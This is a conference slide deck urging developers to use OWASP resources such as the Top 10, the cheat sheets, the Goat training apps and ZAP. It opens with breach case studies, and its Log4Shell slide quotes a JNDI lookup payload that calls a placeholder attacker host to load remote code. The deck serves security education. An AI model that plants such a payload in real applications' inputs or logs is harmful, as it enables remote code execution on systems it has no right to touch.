Security Does Not Need To Be Fun: Ignoring OWASP To Have A Terrible Time - Dwayne McDaniel - CNCF 2023 (slide deck, 72 slides)
Security Does Not Need To Be Fun: Ignoring OWASP To Have A Terrible Time

Hi, I'm Dwayne
Dwayne McDaniel. I live in Chicago. I've been a Developer Advocate since 2016. On Twitter: @mcdwayne. Happy to chat about anything, hit me up. Besides tech, I love improv, karaoke and going to rock and roll shows!

About GitGuardian
GitGuardian is the code security platform for the DevOps generation. With automated secrets detection and remediation, our platform enables Dev, Sec, and Ops to advance together towards the Secure Software Development Lifecycle.

What Does Good Security Look Like?

All Technology Has Human Costs

What Does Bad Security Look Like?

"All happy families are alike; each unhappy family is unhappy in its own way." - Leo Tolstoy, Anna Karenina

A Few Unhappy Families (Companies)

Apache Log4Shell, CVE-2021-44228
Reported: 24 November 2021. The vulnerable lookup feature had existed since 2013.
Log4j expanded ${...} lookups found inside logged message text. A logged string such as ${jndi:ldap://attacker-host/x} made the application connect to an arbitrary LDAP (or other JNDI-reachable) server, fetch a Java object and execute it, so anyone who could get text into a log line could run any code, including opening interactive shells. Impacted over 44% of corporate networks worldwide.
Top companies with products affected include: Adobe, Cisco, AWS, Broadcom, IBM, Okta, VMware.

A Few Unhappy Families (Companies)

Uber
Reported: 15 September 2022
A teenager from the Lapsus$ hacking group social-engineered a contractor's login, then immediately discovered admin credentials hardcoded in PowerShell scripts on an internal network share, which gave them privileged access to almost everything ("pwnage"). Reported first in the New York Times.

CircleCI
Reported: 4 January 2023
An unauthorized third party used malware deployed to a CircleCI engineer's laptop to steal a valid, 2FA-backed SSO session. The attackers ultimately gained access to many customers' GitHub OAuth credentials and platform security tokens. This caused a system-wide token rotation, disrupting thousands of customers. The investigation was still ongoing at the time of the talk.

Security Teams Are Outnumbered
"In the best organizations developers outnumber security team members 100:1" - Alex Rice, HackerOne, #Security2022

Shift Left! Put Everyone On The Security Team

But Devs Already Have A Lot To Worry About:
- Delivery deadlines
- Billable hours
- Number of tickets closed
- Bugs
- DevOps
- Fighting Kubernetes
- Only so much time

Business Priority View of Security (a cycle)
Security incident -> Focus on security -> Delivery slows down -> Focus on new feature delivery times -> Security incident -> ...

The Number Of Security Tools Is Overwhelming

"Now, here, you see, it takes all the running you can do, to keep in the same place. If you want to get somewhere else, you must run at least twice as fast as that!" - The Red Queen, Through the Looking-Glass, and What Alice Found There

I Wish Some Benevolent Group Of Security Experts Could Help Me With This Stuff

Open Web Application Security Project
OWASP.ORG

OWASP Mission
As the world's largest non-profit organization concerned with software security, OWASP:
- Supports the building of impactful projects;
- Develops & nurtures communities through events and chapter meetings worldwide; and
- Provides educational publications & resources in
order to enable developers to write better software, and security professionals to make the world's software more secure.

OK, But How Do I Navigate This Site?

OWASP Overview
- Projects
- Communities
- Events
- Education and Training
- Publications and Resources

OWASP Projects
- Open source repos
- Built by volunteers and experts
- New weekly submissions from the community
- 250 total projects in any state
- 150 in a usable state

OWASP Project Categories
- Flagship Projects
- Production Projects (new)
- Lab Projects
- Incubator Projects

OWASP Flagship Projects
18 current Flagship projects. The OWASP Flagship designation is given to projects that have demonstrated strategic value to OWASP and application security as a whole.

OWASP Lab Projects
34 Lab projects. OWASP Labs projects represent projects that have produced an OWASP-reviewed deliverable of value.

OWASP Incubator Projects
105 Incubator projects. OWASP Incubator projects represent the experimental playground where projects are still being fleshed out, ideas are still being proven, and development is still underway.

OWASP Project Types
- Tool projects: 75
- Documentation projects: 80
- Code projects: 34
- Other: 3

OWASP Projects Are Organized Around CRE (Common Requirement Enumeration)

OWASP CRE
- Links together standards (NIST, CWE) in a coherent way
- Helps clarify what each OWASP project is specifically addressing
- https://www.opencre.org lets you just search the high-level topic

Community

OWASP Community
- Chapters all over the world
- Organized via Meetup in most areas
- Many online events
- OWASP Meetup at the GitGuardian office, October 2022

Events

OWASP Events
- Multiple events per year
- Global events
- AppSec Days
- Partner events

Education and Training

OWASP Education and Training
https://secureflag.owasp.org/

Publications and Resources

OWASP Publications and Resources
- Books
- Many free resources online
- There is a good deal of crossover with Projects

OK, OWASP Does A Lot. How Can I Use This?

OWASP Getting Started
1. Top 10
2. Cheat Sheet Series
3. Goats
4. ZAP

OWASP Top 10
"The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications." The list is of risk categories rather than attack types, and it is updated every few years (2013, 2017, 2021 editions), not yearly.

Cheat Sheet Series

OWASP Cheat Sheet Series
https://cheatsheetseries.owasp.org/

Goats (Greatest Of All Time?)

OWASP Goats
Goats are deliberately insecure applications for testing and training purposes.
- Lab projects: WebGoat, NodeGoat (Node.js), WrongSecrets
- Incubator or proposed projects: PyGoat, AndroGoat, ChainGoat, Laravel Goat, WebGoat PHP, SupplyChainGoat
Extremely well documented and discussed in media. Demo by maintainer on YouTube: https:/

ZAP

OWASP ZAP

In Conclusion

OWASP Getting Started
1. Top 10
2. Cheat Sheet Series
3. Goats (not the greatest of all time)
4. ZAP